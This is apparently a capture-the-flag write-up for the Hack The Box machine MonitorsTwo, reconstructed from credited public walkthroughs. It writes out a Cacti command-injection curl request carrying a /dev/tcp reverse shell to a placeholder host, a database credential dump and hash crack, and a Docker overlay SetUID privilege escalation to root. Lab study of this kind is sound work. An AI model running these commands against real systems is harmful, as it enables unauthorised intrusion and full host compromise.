Summary

This writeup is reconstructed from public walkthroughs (see Source attribution below). I have not personally rooted this box.

MonitorsTwo is an Easy Linux box: CVE-2022-46169 Cacti 1.2.22 unauth RCE via remote_agent.php with X-Forwarded-For: 127.0.0.1 to bypass IP allowlist → www-data in container. Cacti DB has bcrypt for marcus → crack funkymonkey → SSH. Privesc: container-escape via CVE-2021-41091 (Docker 20.10.5) — set up SetUID bash inside the container, then exec it from the host through the container’s overlay path.

The chain:

1. Cacti /remote_agent.php?action=polldata&... accepts host_id + local_data_ids[] and runs proc_open with user-controlled command components. Auth bypass: X-Forwarded-For: 127.0.0.1 since allowlist trusts XFF.
2. Shell as www-data inside Cacti container. MySQL local creds default root:root → dump user_auth → crack marcus’s bcrypt.
3. SSH as marcus on host.
4. Container’s overlay diff dir on host is owned root but has lax permissions (CVE-2021-41091). Inside the container as root via local capsh: chmod +s /bin/bash. On host: navigate to the overlay diff containing the modified bash and execute → root.

Recon

22/tcp     OpenSSH
80/tcp     Cacti 1.2.22

Foothold — CVE-2022-46169

curl 'http://10.10.11.211/cacti/remote_agent.php?action=polldata&local_data_ids[]=1&host_id=1&poller_id=`bash -c "bash -i >& /dev/tcp/<C2>/<p> 0>&1"`' \
   -H 'X-Forwarded-For: 127.0.0.1'
# www-data in cacti container

$ mysql -uroot -proot
mysql> select username, password from user_auth;
... marcus : <bcrypt>
$ hashcat -m 3200 hash rockyou.txt → funkymonkey
$ ssh [email protected]

Privesc — CVE-2021-41091 docker overlay

# In the Cacti container as root (via capsh / cap_setuid):
$ capsh --gid=0 --uid=0 --
# chmod a+s on bash in container
$ chmod +s /bin/bash

# As marcus on host: find the container's writable layer
$ find /var/lib/docker -name 'bash' -perm -4000 2>/dev/null
/var/lib/docker/overlay2/<id>/diff/bin/bash
$ /var/lib/docker/overlay2/<id>/diff/bin/bash -p
# root on host

Why each step worked

• CVE-2022-46169: missing auth + command injection in remote_agent.php’s polldata path; XFF allowlist bypass.
• DB default creds: container ships with root:root.
• CVE-2021-41091: Docker’s overlay layer permissions let an unprivileged host user execute SetUID bins from the container’s diff dir.

Counterfactuals

• Patch Cacti ≥ 1.2.23.
• Don’t trust X-Forwarded-For for auth; require explicit source-IP at L4.
• Patch Docker ≥ 20.10.9.

Source attribution

Reconstruction is grounded in:

• 0xdf, “HTB: MonitorsTwo” — https://0xdf.gitlab.io/2023/09/02/htb-monitorstwo.html
• IppSec, “MonitorsTwo” video walkthrough — https://ippsec.rocks/?#MonitorsTwo

I have not personally rooted this box; the chain above is a study-guide reconstruction of those public sources.